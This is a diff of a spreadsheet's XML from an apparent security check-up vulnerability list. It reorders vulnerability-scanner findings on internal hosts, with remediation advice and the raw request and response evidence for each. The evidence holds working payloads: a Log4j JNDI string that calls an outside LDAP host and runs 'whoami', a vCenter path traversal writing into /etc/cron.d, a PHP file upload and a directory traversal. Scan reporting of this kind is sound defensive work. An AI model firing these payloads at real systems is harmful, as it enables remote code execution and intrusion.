--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -1496,7 +1496,7 @@
     <row r="8">
       <c r="A8" t="inlineStr">
         <is>
-          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+          <t>VMware vCenter Server 文件上传漏洞(CVE-2021-22005)</t>
         </is>
       </c>
       <c r="B8" t="inlineStr">
@@ -1511,136 +1511,10 @@
       </c>
       <c r="D8" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>Arbitrary File Upload</t>
         </is>
       </c>
       <c r="E8" t="inlineStr">
-        <is>
-          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
-2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
-        </is>
-      </c>
-      <c r="F8" t="inlineStr">
-        <is>
-          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
-Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
-        </is>
-      </c>
-      <c r="G8" t="inlineStr">
-        <is>
-          <t>Hot Exploit、Ransomware Exploit、Virus Exploit、Active Vuln、APT Exploit、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
-        </is>
-      </c>
-      <c r="H8" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I8" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J8" t="inlineStr">
-        <is>
-          <t>CVE-2021-44228</t>
-        </is>
-      </c>
-      <c r="K8" t="inlineStr">
-        <is>
-          <t>2026-06-08 13:50</t>
-        </is>
-      </c>
-      <c r="L8" t="inlineStr">
-        <is>
-          <t>2026-06-08 13:17</t>
-        </is>
-      </c>
-      <c r="M8" t="inlineStr">
-        <is>
-          <t>192.168.100.200</t>
-        </is>
-      </c>
-      <c r="N8" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O8" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P8" t="inlineStr"/>
-      <c r="Q8" t="inlineStr"/>
-      <c r="R8" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S8" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T8" t="inlineStr"/>
-      <c r="U8" t="inlineStr">
-        <is>
-          <t>6379</t>
-        </is>
-      </c>
-      <c r="V8" t="inlineStr">
-        <is>
-          <t>192.168.100.200:6379/MavenWeb/get.jsp</t>
-        </is>
-      </c>
-      <c r="W8" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X8" t="inlineStr">
-        <is>
-          <t>页面url: 192.168.100.200:6379/MavenWeb/get.jsp
-请求体: POST /MavenWeb/get.jsp HTTP/1.1\r\nHost: 192.168.100.200:6379\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nConnection: keep-alive\r\ncmd: whoami\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 61\r\n\r\n
-data=${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho}
-响应体: HTTP/1.1 200\r\nSet-Cookie: JSESSIONID=138ACFF865B192BF41130F4C60A3D32F; Path=/MavenWeb; HttpOnly\r\nContent-Type: text/html;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nDate: Mon, 08 Jun 2026 17:50:35 GMT\r\nKeep-Alive: timeout=20\r\nConnection: keep-alive\r\n\r\n
-Dc-win12%5Cadministrator\r\n\r\n${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho} \r\n\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;Title&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n\r\n&lt;/body&gt;\r\n&lt;/html&gt;</t>
-        </is>
-      </c>
-      <c r="Y8" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z8" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="9">
-      <c r="A9" t="inlineStr">
-        <is>
-          <t>VMware vCenter Server 文件上传漏洞(CVE-2021-22005)</t>
-        </is>
-      </c>
-      <c r="B9" t="inlineStr">
-        <is>
-          <t>急需修复</t>
-        </is>
-      </c>
-      <c r="C9" t="inlineStr">
-        <is>
-          <t>严重</t>
-        </is>
-      </c>
-      <c r="D9" t="inlineStr">
-        <is>
-          <t>Arbitrary File Upload</t>
-        </is>
-      </c>
-      <c r="E9" t="inlineStr">
         <is>
           <t>安全版本：
 vCenter Server 6.7 U3o
@@ -1649,86 +1523,86 @@
 官方已发布安全补丁，链接如下：https://www.vmware.com/security/advisories/VMSA-2021-0020.html</t>
         </is>
       </c>
-      <c r="F9" t="inlineStr">
+      <c r="F8" t="inlineStr">
         <is>
           <t>VMware  vCenter Server是美国威睿（VMware）公司的一套服务器和虚拟化管理软件。
 VMware  vCenter Server存在文件上传漏洞，攻击者可通过访问开放web端口的服务器向vCenter Server发送上传特定的文件从而在Center服务器上执行代码。</t>
         </is>
       </c>
-      <c r="G9" t="inlineStr">
+      <c r="G8" t="inlineStr">
         <is>
           <t>Vuln with Attack Code Disclosure、Ransomware Exploit、Virus Exploit、Highly Exploitable Vuln</t>
         </is>
       </c>
-      <c r="H9" t="inlineStr">
+      <c r="H8" t="inlineStr">
         <is>
           <t>STA</t>
         </is>
       </c>
-      <c r="I9" t="inlineStr">
+      <c r="I8" t="inlineStr">
         <is>
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J9" t="inlineStr">
+      <c r="J8" t="inlineStr">
         <is>
           <t>CVE-2021-22005</t>
         </is>
       </c>
-      <c r="K9" t="inlineStr">
+      <c r="K8" t="inlineStr">
         <is>
           <t>2026-06-08 13:50</t>
         </is>
       </c>
-      <c r="L9" t="inlineStr">
+      <c r="L8" t="inlineStr">
         <is>
           <t>2026-06-08 13:17</t>
         </is>
       </c>
-      <c r="M9" t="inlineStr">
+      <c r="M8" t="inlineStr">
         <is>
           <t>192.168.26.44</t>
         </is>
       </c>
-      <c r="N9" t="inlineStr">
+      <c r="N8" t="inlineStr">
         <is>
           <t>其他</t>
         </is>
       </c>
-      <c r="O9" t="inlineStr">
+      <c r="O8" t="inlineStr">
         <is>
           <t>MSS研发组</t>
         </is>
       </c>
-      <c r="P9" t="inlineStr"/>
-      <c r="Q9" t="inlineStr"/>
-      <c r="R9" t="inlineStr">
+      <c r="P8" t="inlineStr"/>
+      <c r="Q8" t="inlineStr"/>
+      <c r="R8" t="inlineStr">
         <is>
           <t>普通资产</t>
         </is>
       </c>
-      <c r="S9" t="inlineStr">
+      <c r="S8" t="inlineStr">
         <is>
           <t>台账资产</t>
         </is>
       </c>
-      <c r="T9" t="inlineStr"/>
-      <c r="U9" t="inlineStr">
+      <c r="T8" t="inlineStr"/>
+      <c r="U8" t="inlineStr">
         <is>
           <t>8080</t>
         </is>
       </c>
-      <c r="V9" t="inlineStr">
+      <c r="V8" t="inlineStr">
         <is>
           <t>172.16.165.153:2222/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell</t>
         </is>
       </c>
-      <c r="W9" t="inlineStr">
+      <c r="W8" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="X9" t="inlineStr">
+      <c r="X8" t="inlineStr">
         <is>
           <t xml:space="preserve">页面url: 172.16.165.153:2222/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell
 请求体: POST /analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../../../etc/cron.d/xshell HTTP/1.1
@@ -1757,6 +1631,132 @@
 Content-Length: 0
 Connection: close
 </t>
+        </is>
+      </c>
+      <c r="Y8" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z8" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>Apache Log4j2远程代码执行漏洞(CVE-2021-44228)</t>
+        </is>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>急需修复</t>
+        </is>
+      </c>
+      <c r="C9" t="inlineStr">
+        <is>
+          <t>严重</t>
+        </is>
+      </c>
+      <c r="D9" t="inlineStr">
+        <is>
+          <t>Code Execution</t>
+        </is>
+      </c>
+      <c r="E9" t="inlineStr">
+        <is>
+          <t>1.Java 6 将 log4j 升级到 2.3.1 版本，Java 7 将 log4j 升级到 2.12.3 版本，Java 8 或更高版本将 log4j 升级到 2.17.0 版本，下载地址：https://logging.apache.org/log4j/2.x/download.html
+2.若暂时无法升级，删除jar包中漏洞相关的JndiLookup.class文件： zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</t>
+        </is>
+      </c>
+      <c r="F9" t="inlineStr">
+        <is>
+          <t>Apache Log4j是一个功能强大的日志组件，提供方便的日志记录。
+Apache Log4j2存在远程代码执行漏洞，由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。</t>
+        </is>
+      </c>
+      <c r="G9" t="inlineStr">
+        <is>
+          <t>Hot Exploit、Ransomware Exploit、Virus Exploit、Active Vuln、APT Exploit、Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
+        </is>
+      </c>
+      <c r="H9" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I9" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J9" t="inlineStr">
+        <is>
+          <t>CVE-2021-44228</t>
+        </is>
+      </c>
+      <c r="K9" t="inlineStr">
+        <is>
+          <t>2026-06-08 13:50</t>
+        </is>
+      </c>
+      <c r="L9" t="inlineStr">
+        <is>
+          <t>2026-06-08 13:17</t>
+        </is>
+      </c>
+      <c r="M9" t="inlineStr">
+        <is>
+          <t>192.168.100.200</t>
+        </is>
+      </c>
+      <c r="N9" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O9" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P9" t="inlineStr"/>
+      <c r="Q9" t="inlineStr"/>
+      <c r="R9" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S9" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T9" t="inlineStr"/>
+      <c r="U9" t="inlineStr">
+        <is>
+          <t>6379</t>
+        </is>
+      </c>
+      <c r="V9" t="inlineStr">
+        <is>
+          <t>192.168.100.200:6379/MavenWeb/get.jsp</t>
+        </is>
+      </c>
+      <c r="W9" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X9" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.100.200:6379/MavenWeb/get.jsp
+请求体: POST /MavenWeb/get.jsp HTTP/1.1\r\nHost: 192.168.100.200:6379\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nConnection: keep-alive\r\ncmd: whoami\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 61\r\n\r\n
+data=${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho}
+响应体: HTTP/1.1 200\r\nSet-Cookie: JSESSIONID=138ACFF865B192BF41130F4C60A3D32F; Path=/MavenWeb; HttpOnly\r\nContent-Type: text/html;charset=UTF-8\r\nTransfer-Encoding: chunked\r\nDate: Mon, 08 Jun 2026 17:50:35 GMT\r\nKeep-Alive: timeout=20\r\nConnection: keep-alive\r\n\r\n
+Dc-win12%5Cadministrator\r\n\r\n${jndi:ldap://11.11.12.101:1234/TomcatBypass/TomcatEcho} \r\n\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;Title&lt;/title&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n\r\n&lt;/body&gt;\r\n&lt;/html&gt;</t>
         </is>
       </c>
       <c r="Y9" t="inlineStr">
@@ -2498,7 +2498,7 @@
     <row r="15">
       <c r="A15" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>目录遍历漏洞</t>
         </is>
       </c>
       <c r="B15" t="inlineStr">
@@ -2513,13 +2513,17 @@
       </c>
       <c r="D15" t="inlineStr">
         <is>
-          <t>Code Execution</t>
-        </is>
-      </c>
-      <c r="E15" t="inlineStr"/>
+          <t>Directory Traversal</t>
+        </is>
+      </c>
+      <c r="E15" t="inlineStr">
+        <is>
+          <t>您应该确保目录不包含敏感信息，或者限制来自web服务器配置的目录清单。</t>
+        </is>
+      </c>
       <c r="F15" t="inlineStr">
         <is>
-          <t>此脚本可能容易受到代码执行攻击。代码注入漏洞会发生在这种情况下，它可以以触发服务器端代码执行的方式来操纵Web应用程序提供的输出或内容。 在某些允许用户修改服务器端文件的不良Web应用程序中（例如通过发布到留言板或留言簿），有时可以使用应用程序本身的脚本语言来注入代码。</t>
+          <t>web服务器配置为显示此目录中包含的文件列表。不建议这样做，因为该目录可能包含一些敏感文件，这些文件通常不会通过web站点上的链接公开。</t>
         </is>
       </c>
       <c r="G15" t="inlineStr">
@@ -2578,20 +2582,286 @@
       <c r="T15" t="inlineStr"/>
       <c r="U15" t="inlineStr">
         <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="V15" t="inlineStr">
+        <is>
+          <t>10.60.62.249/install.php?dl=/../../local/config/index.php</t>
+        </is>
+      </c>
+      <c r="W15" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X15" t="inlineStr">
+        <is>
+          <t>页面url: 10.60.62.249/install.php?dl=/../../local/config/index.php
+请求体: GET /install.php?dl=/../../local/config/index.php HTTP/1.1
+Host: 10.60.62.249
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+响应体: HTTP/1.1 302 Found
+Date: Thu, 30 Nov 2023 08:41:47 GMT
+Server:
+Location: https://10.60.62.249/install.php?dl=/../../local/config/index.php
+Cache-Control: max-age=604800
+Expires: Thu, 07 Dec 2023 08:41:47 GMT
+Content-Length: 249
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
+&lt;html&gt;&lt;head&gt;
+&lt;title&gt;302 Found&lt;/title&gt;
+&lt;/head&gt;&lt;body&gt;
+&lt;h1&gt;Found&lt;/h1&gt;
+&lt;p&gt;The document has moved &lt;a href="https://10.60.62.249/install.php?dl=/../../local/config/index.php"&gt;here&lt;/a&gt;.&lt;/p&gt;
+&lt;/body&gt;&lt;/html&gt;</t>
+        </is>
+      </c>
+      <c r="Y15" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z15" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="16">
+      <c r="A16" t="inlineStr">
+        <is>
+          <t>Spring Boot Actuator未授权访问漏洞</t>
+        </is>
+      </c>
+      <c r="B16" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C16" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D16" t="inlineStr">
+        <is>
+          <t>Unauthorized Access</t>
+        </is>
+      </c>
+      <c r="E16" t="inlineStr">
+        <is>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁下载链接：https://github.com/spring-cloud/spring-cloud-function/tree/0e89ee27b2e76138c16bcba6f4bca906c4f3744f</t>
+        </is>
+      </c>
+      <c r="F16" t="inlineStr">
+        <is>
+          <t>Spring存在未授权访问漏洞，攻击者可以通过默认端口无需密码对数据库任意操作(增删改高危动作)，而且可以远程访问数据库。</t>
+        </is>
+      </c>
+      <c r="G16" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure、Active Vuln</t>
+        </is>
+      </c>
+      <c r="H16" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I16" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J16" t="inlineStr"/>
+      <c r="K16" t="inlineStr">
+        <is>
+          <t>2026-06-08 16:38</t>
+        </is>
+      </c>
+      <c r="L16" t="inlineStr">
+        <is>
+          <t>2026-06-08 16:38</t>
+        </is>
+      </c>
+      <c r="M16" t="inlineStr">
+        <is>
+          <t>192.168.100.200</t>
+        </is>
+      </c>
+      <c r="N16" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O16" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P16" t="inlineStr"/>
+      <c r="Q16" t="inlineStr"/>
+      <c r="R16" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S16" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T16" t="inlineStr"/>
+      <c r="U16" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="V16" t="inlineStr">
+        <is>
+          <t>10.8.0.23:6035/actuator/info</t>
+        </is>
+      </c>
+      <c r="W16" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="X16" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: 10.8.0.23:6035/actuator/info
+请求体: GET /actuator/info HTTP/1.1
+accept-encoding: gzip
+user-agent: ReactorNetty/0.9.10.RELEASE
+host: 10.8.0.23:6035
+Accept: application/vnd.spring-boot.actuator.v2+json, application/vnd.spring-boot.actuator.v1+json, application/json
+响应体: HTTP/1.1 200
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+Pragma: no-cache
+Expires: 0
+Content-Type: application/vnd.spring-boot.actuator.v2+json
+Transfer-Encoding: chunked
+Date: Thu, 30 Nov 2023 07:31:42 GMT
+{}
+</t>
+        </is>
+      </c>
+      <c r="Y16" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Z16" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="17">
+      <c r="A17" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="B17" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C17" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D17" t="inlineStr">
+        <is>
+          <t>Code Execution</t>
+        </is>
+      </c>
+      <c r="E17" t="inlineStr"/>
+      <c r="F17" t="inlineStr">
+        <is>
+          <t>此脚本可能容易受到代码执行攻击。代码注入漏洞会发生在这种情况下，它可以以触发服务器端代码执行的方式来操纵Web应用程序提供的输出或内容。 在某些允许用户修改服务器端文件的不良Web应用程序中（例如通过发布到留言板或留言簿），有时可以使用应用程序本身的脚本语言来注入代码。</t>
+        </is>
+      </c>
+      <c r="G17" t="inlineStr">
+        <is>
+          <t>Vuln with Attack Code Disclosure</t>
+        </is>
+      </c>
+      <c r="H17" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I17" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J17" t="inlineStr"/>
+      <c r="K17" t="inlineStr">
+        <is>
+          <t>2026-06-08 16:38</t>
+        </is>
+      </c>
+      <c r="L17" t="inlineStr">
+        <is>
+          <t>2026-06-08 16:38</t>
+        </is>
+      </c>
+      <c r="M17" t="inlineStr">
+        <is>
+          <t>192.168.100.200</t>
+        </is>
+      </c>
+      <c r="N17" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O17" t="inlineStr">
+        <is>
+          <t>MSS研发组</t>
+        </is>
+      </c>
+      <c r="P17" t="inlineStr"/>
+      <c r="Q17" t="inlineStr"/>
+      <c r="R17" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S17" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T17" t="inlineStr"/>
+      <c r="U17" t="inlineStr">
+        <is>
           <t>23</t>
         </is>
       </c>
-      <c r="V15" t="inlineStr">
+      <c r="V17" t="inlineStr">
         <is>
           <t>192.168.100.200:23/045/index.action</t>
         </is>
       </c>
-      <c r="W15" t="inlineStr">
+      <c r="W17" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="X15" t="inlineStr">
+      <c r="X17" t="inlineStr">
         <is>
           <t>页面url: 192.168.100.200:23/045/index.action
 请求体: GET /045/index.action HTTP/1.1
@@ -2608,118 +2878,118 @@
 root</t>
         </is>
       </c>
-      <c r="Y15" t="inlineStr">
+      <c r="Y17" t="inlineStr">
         <is>
           <t>待处置</t>
         </is>
       </c>
-      <c r="Z15" t="inlineStr">
+      <c r="Z17" t="inlineStr">
         <is>
           <t>内网</t>
         </is>
       </c>
     </row>
-    <row r="16">
-      <c r="A16" t="inlineStr">
+    <row r="18">
+      <c r="A18" t="inlineStr">
         <is>
           <t>文件上传漏洞</t>
         </is>
       </c>
-      <c r="B16" t="inlineStr">
+      <c r="B18" t="inlineStr">
         <is>
           <t>尽快修复</t>
         </is>
       </c>
-      <c r="C16" t="inlineStr">
+      <c r="C18" t="inlineStr">
         <is>
           <t>高危</t>
         </is>
       </c>
-      <c r="D16" t="inlineStr">
+      <c r="D18" t="inlineStr">
         <is>
           <t>Arbitrary File Upload</t>
         </is>
       </c>
-      <c r="E16" t="inlineStr">
+      <c r="E18" t="inlineStr">
         <is>
           <t>限制接受上传的文件类型：检查文件扩展名，仅允许上传某些文件。 使用白名单方法而不是黑名单。检查是否有双扩展名，例如.php.png。 检查文件名没有.htaccess之类的文件（在ASP.NET上，检查诸如web.config之类的配置文件）。更改上载文件夹的权限，以使其中的文件不可执行。 如果可能，请重命名上载的文件。</t>
         </is>
       </c>
-      <c r="F16" t="inlineStr">
+      <c r="F18" t="inlineStr">
         <is>
           <t>此脚本可能容易受到无限制文件上传的影响。 各种Web应用程序都允许用户上传文件（例如图片，图像，声音等）。 如果处理不当，上载的文件可能会构成重大风险。 远程攻击者可以发送带有特制文件名或mime类型的多部分/表单数据POST请求并执行任意代码。 上载包含可执行代码的文件并执行此代码。 检查攻击详细信息，以获取有关此攻击的更多信息。</t>
         </is>
       </c>
-      <c r="G16" t="inlineStr">
+      <c r="G18" t="inlineStr">
         <is>
           <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
-      <c r="H16" t="inlineStr">
+      <c r="H18" t="inlineStr">
         <is>
           <t>STA</t>
         </is>
       </c>
-      <c r="I16" t="inlineStr">
+      <c r="I18" t="inlineStr">
         <is>
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J16" t="inlineStr"/>
-      <c r="K16" t="inlineStr">
+      <c r="J18" t="inlineStr"/>
+      <c r="K18" t="inlineStr">
         <is>
           <t>2026-06-08 16:38</t>
         </is>
       </c>
-      <c r="L16" t="inlineStr">
+      <c r="L18" t="inlineStr">
         <is>
           <t>2026-06-08 16:38</t>
         </is>
       </c>
-      <c r="M16" t="inlineStr">
+      <c r="M18" t="inlineStr">
         <is>
           <t>192.168.100.200</t>
         </is>
       </c>
-      <c r="N16" t="inlineStr">
+      <c r="N18" t="inlineStr">
         <is>
           <t>其他</t>
         </is>
       </c>
-      <c r="O16" t="inlineStr">
+      <c r="O18" t="inlineStr">
         <is>
           <t>MSS研发组</t>
         </is>
       </c>
-      <c r="P16" t="inlineStr"/>
-      <c r="Q16" t="inlineStr"/>
-      <c r="R16" t="inlineStr">
+      <c r="P18" t="inlineStr"/>
+      <c r="Q18" t="inlineStr"/>
+      <c r="R18" t="inlineStr">
         <is>
           <t>普通资产</t>
         </is>
       </c>
-      <c r="S16" t="inlineStr">
+      <c r="S18" t="inlineStr">
         <is>
           <t>台账资产</t>
         </is>
       </c>
-      <c r="T16" t="inlineStr"/>
-      <c r="U16" t="inlineStr">
+      <c r="T18" t="inlineStr"/>
+      <c r="U18" t="inlineStr">
         <is>
           <t>80</t>
         </is>
       </c>
-      <c r="V16" t="inlineStr">
+      <c r="V18" t="inlineStr">
         <is>
           <t>192.200.41.184:8001/ispirit/im/upload.php</t>
         </is>
       </c>
-      <c r="W16" t="inlineStr">
+      <c r="W18" t="inlineStr">
         <is>
           <t>未知</t>
         </is>
       </c>
-      <c r="X16" t="inlineStr">
+      <c r="X18" t="inlineStr">
         <is>
           <t>页面url: 192.200.41.184:8001/ispirit/im/upload.php
 请求体: POST //ispirit/im/upload.php HTTP/1.1
@@ -2775,276 +3045,6 @@
 {"status":"1","content":"[vm]2890@2003_1687139638|aa.php.|0[\/vm]","file_id":"19"}</t>
         </is>
       </c>
-      <c r="Y16" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Z16" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="17">
-      <c r="A17" t="inlineStr">
-        <is>
-          <t>目录遍历漏洞</t>
-        </is>
-      </c>
-      <c r="B17" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C17" t="inlineStr">
-        <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D17" t="inlineStr">
-        <is>
-          <t>Directory Traversal</t>
-        </is>
-      </c>
-      <c r="E17" t="inlineStr">
-        <is>
-          <t>您应该确保目录不包含敏感信息，或者限制来自web服务器配置的目录清单。</t>
-        </is>
-      </c>
-      <c r="F17" t="inlineStr">
-        <is>
-          <t>web服务器配置为显示此目录中包含的文件列表。不建议这样做，因为该目录可能包含一些敏感文件，这些文件通常不会通过web站点上的链接公开。</t>
-        </is>
-      </c>
-      <c r="G17" t="inlineStr">
-        <is>
-          <t>Vuln with Attack Code Disclosure</t>
-        </is>
-      </c>
-      <c r="H17" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I17" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J17" t="inlineStr"/>
-      <c r="K17" t="inlineStr">
-        <is>
-          <t>2026-06-08 16:38</t>
-        </is>
-      </c>
-      <c r="L17" t="inlineStr">
-        <is>
-          <t>2026-06-08 16:38</t>
-        </is>
-      </c>
-      <c r="M17" t="inlineStr">
-        <is>
-          <t>192.168.100.200</t>
-        </is>
-      </c>
-      <c r="N17" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O17" t="inlineStr">
-        <is>
-          <t>MSS研发组</t>
-        </is>
-      </c>
-      <c r="P17" t="inlineStr"/>
-      <c r="Q17" t="inlineStr"/>
-      <c r="R17" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S17" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T17" t="inlineStr"/>
-      <c r="U17" t="inlineStr">
-        <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="V17" t="inlineStr">
-        <is>
-          <t>10.60.62.249/install.php?dl=/../../local/config/index.php</t>
-        </is>
-      </c>
-      <c r="W17" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="X17" t="inlineStr">
-        <is>
-          <t>页面url: 10.60.62.249/install.php?dl=/../../local/config/index.php
-请求体: GET /install.php?dl=/../../local/config/index.php HTTP/1.1
-Host: 10.60.62.249
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-响应体: HTTP/1.1 302 Found
-Date: Thu, 30 Nov 2023 08:41:47 GMT
-Server:
-Location: https://10.60.62.249/install.php?dl=/../../local/config/index.php
-Cache-Control: max-age=604800
-Expires: Thu, 07 Dec 2023 08:41:47 GMT
-Content-Length: 249
-Connection: close
-Content-Type: text/html; charset=iso-8859-1
-&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
-&lt;html&gt;&lt;head&gt;
-&lt;title&gt;302 Found&lt;/title&gt;
-&lt;/head&gt;&lt;body&gt;
-&lt;h1&gt;Found&lt;/h1&gt;
-&lt;p&gt;The document has moved &lt;a href="https://10.60.62.249/install.php?dl=/../../local/config/index.php"&gt;here&lt;/a&gt;.&lt;/p&gt;
-&lt;/body&gt;&lt;/html&gt;</t>
-        </is>
-      </c>
-      <c r="Y17" t="inlineStr">
-        <is>
-          <t>待处置</t>
